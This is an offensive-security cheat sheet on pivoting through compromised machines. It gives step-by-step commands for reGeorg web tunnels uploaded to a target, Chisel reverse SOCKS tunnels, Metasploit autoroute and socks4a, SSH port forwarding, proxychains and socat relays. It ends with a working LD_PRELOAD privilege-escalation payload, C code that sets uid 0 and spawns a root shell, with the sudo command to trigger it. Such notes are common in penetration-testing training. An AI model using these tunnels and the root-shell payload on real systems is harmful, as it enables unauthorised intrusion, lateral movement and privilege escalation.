pivoting proxies

Pivoting Using Proxies

REGEORG

1.) Upload reGeorg tunnel with appropriate language to target. For example tunnel.aspx needs to be loaded to an accessible location on a target machine. 


2.) Once uploaded on your attack machine issue the below command

sudo python reGeorgSocksProxy.py -u <url>/<uri>/tunnel.aspx -v INFO


3.) Edit your proxychains configuration to use 

# Edit the config file

vi /etc/proxychains.conf

# Add the below contents to the bottom of the file
socks4 127.0.0.1 8888


4.) Connect to or access the target or do more enum

proxychains nmap -p- <ip>




USING CHISEL

1.) Upload Chisel to target

  wget <url>/chisel


2.) On attack machine start a chisel server
 chisel server -p 8000 -reverse

3.) On target machine connect to our chisel server with a chisel client
 chisel client  <ip>:<port> R:<serverListeningPort>:127.0.0.1:<ClientNewListeningPortToOpen> &

4.) On target machine again start a chisel server
 chisel server -p <ClientNewListeningPortToOpen>  --socks5 &

5.) Connect to that server from attack box using chisel one more time
chisel client 127.0.0.1:<serverListeningPort> socks


6.) Add the below line to the end of /etc/proxychains.conf to use the proxy tunnel

socks5 127.0.0.1 1080



METERPRETER

1.) Create a route or use /post/multi/manage/autoroute

  route add <ipv4> <subnet mask> <session id number>


2.) Set up socks4a proxy

  use auxiliary/server/socks4a

  set SRVHOST 0.0.0.0

  set SRVPORT 1080


3.) Add the below line to /etc/proxychains.conf

  socks4 127.0.0.1 1080




PROXYCHAINS

Issue proxychains command before nmap, msfconsole, python and other commands to use the proxy you set up




SSH TUNNELS

Add hte -nNT flag to only open a connection and not a working SSH session


Local SSH Tunnel

The below command will be issued on a local machine. Accessing 127.0.0.1 on port 9000 will actually be port 80 on remote machine

  ssh -L 9000:imgur.com:80 <username>@<remotemachine.com>


Remote SSH Tunnel

For this to work edit /etc/ssh/sshd_config and set GatewayPorts yes. Save the file and restart the sshd service.

On a remote machine, issue the below command to allow a remote user to connect to your machine. In the below example the remote machine is listening on port 9000. Local host refers to the machine issuing the command and 3000 is the port listening on your machine.


ssh -R 9000:localhost:3000 <username>@<target.com>




Meterpreter port forwarding (inside session):

portfwd add -l <localport> -p <remoteport> -r <target host>



SSH static port forwarding (single port, execute on attacker):

ssh -nNT -L 127.0.0.1:8888:<targetip>:<targetport> <user>@<target> 



SSH Dynamic Port Forwarding (Execute On Attack Machine):

ssh -D <localport> user@host



SSH Remote forwarding (Execute On Target):

ssh -r -R <lport>:<ip>:<rport> user@attacker



Configure proxychains (Change Last Line):

socks4  <ip> <port>



Use proxychains:

proxychains -f pivot.conf <tool> <params>



SSH Jumphosts (Port Forwarding Through Multiple Hosts):

ssh -J jumpuser1@jumphost1,jumpuser2@jumphost2,...,jumpuserN@jumphostN user@host



Socat Example; (Redirect Connection On 5000 To :5001)

socat tcp-listen:5000,reuseaddr,fork tcp:<target ip>:5001


LD_PRELOAD

Check if you can write into the path of privileged binaries, you might be able to abuse the library load order.


Check which functions a binary uses via objectdump -T. 

To use these preload attacks with sudo in /etc/sudoers there must be env_keep += LD_PRELOAD


Preload example payload:

=======================================

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>

void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/sh");

}

=======================================


Compile Preload example payload:

gcc -fPIC -shared -o payload.so payload.c -nostartfiles

sudo LD_PRELOAD=/tmp/payload.so <target>


When playing with the linker configs run ldconfig afterwards or it wont update the linker cache.